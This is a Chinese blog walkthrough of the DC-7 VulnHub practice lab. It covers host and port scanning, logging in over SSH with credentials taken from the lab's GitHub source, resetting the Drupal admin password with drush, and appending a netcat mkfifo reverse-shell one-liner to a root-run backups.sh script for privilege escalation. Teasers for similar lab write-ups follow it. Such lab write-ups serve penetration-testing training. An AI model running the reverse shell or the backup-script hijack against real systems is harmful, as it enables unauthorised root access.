DC-7通关教程

最新推荐文章于 2024-10-31 12:01:55 发布
最新推荐文章于 2024-10-31 12:01:55 发布
阅读量884 收藏 6
点赞数 14
文章标签: 服务器 linux 网络 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74402888/article/details/138136080
版权

一. 信息收集

1. 探测目标主机IP地址

arp-scan -l  //查看网段

vm  编辑--查看虚拟网络编辑器,看到靶机的网段

网段是: 192.168.83.0

是c段网络

2. 全面检测目标IP

nmap -sP 192.168.83.1/24

靶机ip是:

192.168.83.152

攻击机的ip是:

192.168.83.136

3.扫描端口

端口和服务是对应关系的根据计算机网络的应用层协议

nmap -p 1-65535 -A 192.168.83.152

80端口--http服务打开

22端口打开是ssh服务

访问页面

欢迎来到 DC-7

DC-7 引入了一些“新”概念,但我会让你自己去弄清楚它们是什么。 :-)

虽然这个挑战并不是那么技术性强,但如果你需要采用暴力破解或字典攻击,你可能不会成功。

你需要做的是,跳出“盒子”思考。

非常“跳出”盒子思考。 :-)

搜索

4.目录扫描

dirsearch -u 192.168.83.152

没有找到有用的信息

二. 渗透过程

1. 代码审计

废话不多说,先查看github上的源码

$username = "dc7user";

$password = "MdR3xOgB7#dW";

2. ssh远程登入

测试发现登不进后台,但是能登进ssh

ssh dc7user@192.168.83.152

cat mbox

在Linux中,backups.sh 通常是一个脚本文件的名称,用于执行备份任务。这个脚本可能包含一系列的命令,用于将文件、目录或整个系统备份到某个位置,可能是本地磁盘、网络共享、云存储等

root用户及其组用户(www-data)可以写入读取执行·,但其他用户没有写入的权限,这里可以作为提权的一个突破口

查看文件内容

发现了个drush命令,这个是drupal专属的一个操作系统命令,参考Drupal drush 常用命令

3. drush修改密码

这个命令需要先切换到drupal的目录

cd /var/www/html

通过命令我们发现了个管理员账号admin

drush user-information admin

接下来修改admin的密码

drush upwd admin --password="passwd"

登录成功了

4. 反弹shell

进入了后台,想办法写个马进行反弹shell

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.83.136 5555 >/tmp/f" >> backups.sh

监听拿到shell就可以拿到最终flag

吃饱饭,练球
关注
DC-4通关教程
m0_74402888的博客
04-24 2099
6默认的shell:这个字段指定了用户的默认shell,即用户登录后用来执行命令的程序。在Linux系统中,/etc/passwd是一个重要的系统用户配置文件,用于存储系统中所有用户的基本信息。在Linux中,/usr/bin目录主要用于存放用户可执行的二进制文件,即用户可以直接执行的程序。火狐浏览器打开网页,用自带的扩展“wappalyzer”查看页面的一些信息,cms,js版本,和php信息,发现没有可用的信息,5家目录:这个字段指定了用户的家目录,即用户登录后所处的目录。用户可以属于多个组。
DC-5通关教程
m0_74402888的博客
04-25 1064
具体来说,这个命令在文件系统的根目录(/)开始,查找所有设置了setuid位(set user ID on execution)的文件,并将这些文件的路径打印出来。可以看到有两个特殊的命令,exim之前在DC-4的时候试过了,不能完全得到root权限,这里用screen作为突破口,用searchsploit工具搜索一下漏洞。编译完后,再将这两个c文件删掉,文本让我们用rm命令,我们也可以自己删,接着我们修改exp.sh文件内容。刷新后页面内容会发生变化,可能存在文件包涵,这个是一个突破口。
DC-8通关教程
m0_74402888的博客
04-26 1159
SUID是一种对二进制程序进行设置的特殊权限,可以让二进制程序的执行者临时拥有属主的权限,若是对一些特殊命令设置了SUID,那么将会有被提权的风险。nid=1" --level=5 --risk=3 --batch --current-db //爆破当前数据库。测试发现是john的密码,在/user/login处登入,探索发现在WEBFORM处可以编辑并执行PHP代码。sudo是给某个用户或者组授予执行某些命令的权限,权限在人身上。SUID是给命令赋予root用户的权限,权限在命令上。
DC-2通关教程
2401_83876878的博客
09-26 1035
DC-1非常相似,DC-2是另一个专门建立的易受攻击的实验室,目的是获得渗透测试领域的经验。5. 发现不能访问,且发现我们输入的ip地址自动转化为了域名,我们想到dc-2这个域名解析失败,我们需要更改hosts文件,添加一个ip域名指向。cewl http://dc-2/ -w dict.txt 或者 cewl http://dc-2/ > 1.txt。wpscan --url http://dc-2 --enumerate u 枚举用户。登录后台之后,我们看到flag2,我用的是jerry的账号。
Dc-2通关教程
2402_84645634的博客
09-29 821
DC-2从环境搭建到通关教程
DC-3通关教程
m0_74402888的博客
04-23 840
利用John(john 设置为使用特定的哈希格式进行破解,有多种方法可以做到对哈希类型进行识别)工具,对该密码进行爆破拆解。接着我们下载该压缩包并放到kali桌面里,解压该文件,然后在桌面开启http服务,将下载好的文件导入到DC-3靶机里。漏洞查找工具,可以通过操作系统或cms的版本号搜索到相应漏洞,通过查看说明即可找到漏洞利用方法。joomscan是一款开源的且针对joomla的扫描器,kali可以用命令。searchsploit是一款kali自带的搜索漏洞信息的模块。
DC-6通关教程
m0_74402888的博客
04-25 942
原理:nmap 可以执行脚本文件,可以创建一个文件并写入反弹 shell 的命令,默认用root 权限执行,所以反弹的 shell 也是 root。发现了jens用户的无密码命令执行文件backup.sh,也就是以jens的身份横向命令执行,接着我们来看一下该文件。根据在DC-6官网的提示,使用kali自带的巨大字典rockyou.txt中含有k01的密码作为爆破的字典。sudo -l 命令用于列出当前用户可通过 sudo(SuperUser DO)命令执行的所有命令的权限。
DC-1通关教程
2401_83876878的博客
09-20 831
我们切换语句进入shell,执行whoami查看当前权限,执行ls查看当前目录下文件,切换到root目录,查看文件,发现cat thefinalflag.txt文件。查看www目录下文件,发现flag1.txt文件,打开发现提示信息,内容提示寻找站点的配置文件。发现开放了80端口,存在web服务,Apache httpd 2.2.22,Drupal 7。扫描网段中有哪些主机在线,使用 -sP 参数,不扫描端口,只扫描「存活主机」。进入home目录,发现flag4.txt文件,提示需要提升权限。
DC-1通关详解
2401_84741371的博客
09-19 799
此时我们查看 /etc/passwd 文件,发现存在 flag4 用户,我们也可以使用 hydra 进行爆破。查看www目录文件,发现1.txt文件,打开发现提示信息,内容寻找站点的配置文件。扫描网段中有哪些主机在线,使用-sP参数,不扫描端口,只扫描(存活主机)。登陆战点之后,随便翻一番,发现flag3,点击flag3进入,发现提示信息。8.进入home目录,发现flag4.txt文件,提示需要提升文件。发现了22开放端口,开放了ssh服务,OpenSSH 6.0p1。
2024年网安最新DC系列靶机1通关教程_dc1 靶机
2401_84298087的博客
05-01 294
Meterpreter是Metasploit框架中一种强大的后渗透工具,用于在目标系统上执行各种进程控制、信息收集、权限提升和持久化技术等操作。它是一个基于交互式命令行的模块化载荷,可与受感染的目标系统进行远程通信。进程控制:可查看、创建、终止和注入进程。文件系统:可以浏览、上传、下载、编辑和删除文件。系统信息:可获取目标主机的详细信息,如操作系统类型、内核版本等。网络管理:可以查看网络接口、扫描主机、进行端口转发等操作。权限提升:可尝试获取更高的权限,如提升到管理员或SYSTEM权限。
Vulnhub靶机:DC-8渗透详细过程
IerkeU的博客
03-28 3070
DC-8 前情提要 靶场地址:https://www.vulnhub.com/entry/dc-8,367/ DC-8是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个挑战试图证明在 Linux 上安装和配置的双重身份验证是否可以防止 Linux 服务器被攻击。这个挑战的最终目标是绕过双重身份验证,获取根并读取唯一标志。除非您尝试通过SSH登录,否则您可能甚至不知道安装和配置了双重身份验
WEB-CTF通关教程
m0_50098640的博客
08-01 601
信息泄露的第二关 进去页面如下 查看源代码发现后缀为.sql的文件。 看见这个文件思路就是把这个文件下载下来查看敏感数据。尝试在链接后直接加文件名,发现直接下载了我们的文件。 使用记事本打开文件,得到flag值。 暴力破解第二关 打开页面提示如下, 点击地址传送门得到如下链接 将链接的UID使用在线base64解码得到的结果如下 看到这明白了解这个题的思路,抓包爆破UID值。从T_1到T_5000,思路有了,可是具体爆破的时候不知道怎么爆破,等知道怎么解决这个问题了之后再来更。 xss第二关
【xss-labs靶场实战通关教程
AuroraMiraitowa的博客
03-09 1175
好吧,原来还有其他隐藏的传参方法,学到了,下次就一个个测,这里是get传参t_sort,并过滤掉了<>号,不能闭合插入标签,但是我们还能用onfocus事件,因为这里输入框被隐藏了,需要添加type=“text”,构造payload。不难发现,这里面进行了小写转化,将检测出来的on,script,href给删掉了,但是没有关系,我们可以利用双拼写来绕过,这里可以看到,Get传参的值,只插入了h2标签里头,额那下面的input标签啥东西,还隐藏掉了。
【智能交互】OPPO接入小布语音技能通关教程:个人开发者实现接口调用
C站全栈优质创作者、阿里云受邀博主专家,喜欢结识新伙伴寻找志同道合的朋友,欢迎一起探讨学习
07-19 3196
适用人群:本教程适合大赛接入小布语音技能的同学以及初次使用小布助手的开发者本篇文章是博主弄了多次测试才勉强弄明白的,OPPO的开发文档和没有没啥区别很多人会问:“为啥有更成熟的其他语音技能平台放着不用?答:“因为我在参加的比赛是由oppo主办方举办的,若要想进决赛,必须要接入OPPO开放平台”猜想测试部分和实际操作部分,请根据你的需要进行跳过选择。
Linux】ClickHouse 部署
weixin_42364929的博客
10-29 1215
搭建Clickhouse集群时,需要使用Zookeeper去实现集群副本之间的同步,所以需要先搭建zookeeper集群 1、卸载 # 检查有哪些clickhouse依赖包: [root@localhost ~]# yum list installed | grep clickhouse # 移除依赖包: [root@localhost ~]# yum remove -y clickhouse-common-static [root@localhost ~]# yum remove -y clickhou
Atlas800昇腾服务器(型号:3000)—Docker容器部署【图像分类】(十)
weixin_45679938的博客
10-28 1036
(2)导出requirements.txt文件【这里剔除ais_bench相关】(4)构建镜像-名字images_classfication:0001.rc。:鲲鹏 CPU(ARM64)+A300I pro推理卡。(2)启动容器,直接运行脚本:【(1)启动容器,进入终端:【开发套件:版本7.0.1【(5)查看镜像是否存在。
多进程回声服务器
最新发布
asdzccfrew的博客
10-31 414
【代码】多进程回声服务器
若依框架部署到服务器后头像资源访问404
Zwwxd666的博客
10-27 512
也就是说绕过了后端服务器将profile/xxxx/.jpg 转换为/home/xxx/.jpg的过程,直接访问了一个不存在的profile/xxxx/.jpg资源。转念一想,我在本地开发的时候,也就是用idea开发的时候是可以代理的,所以不是后端服务器的锅,问题锁定在nginx上。上面配置文件是宝塔生成的,如果你是自己手动配就不会出现问题,不过我感觉大部分都是用这个配的站点,自己手动太鸡肋了。这个配置将我们的profile/xxxx/.jpg 请求后端服务器 当成了静态资源的访问。
若依框架部署到服务器刷新或者是退出登录出现404
Zwwxd666的博客
10-27 633
原版是index,那玩意是 针对路由的,而打包后的可没index这个文件,他是一个路由,要跳就得说全了用index.html。当然你也可以搞一个保底的nginx配置文件,在目录下找不到html文件时跳转到/index.html。改成/登出的时候重定向到根路径,让nginx匹配去找dist目录下的index.html文件。否则会跳转到一个不存在的html页面,因为打包后的dist文件里只有index html。不发请求,不跳转,类似于a标签的# ,仅让router检测内部跳转。个人推荐第一种,方便。
DC-DC转换器MATLAB例程教程与应用
资源摘要信息:"DC-DC转换器是电力电子技术中一种重要的电源转换设备,其作用是在输入电压与输出电压之间进行能量的转换与调节。该转换过程通常涉及从一个直流电压源转换为另一个直流电压,但电压的大小和稳定性会...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值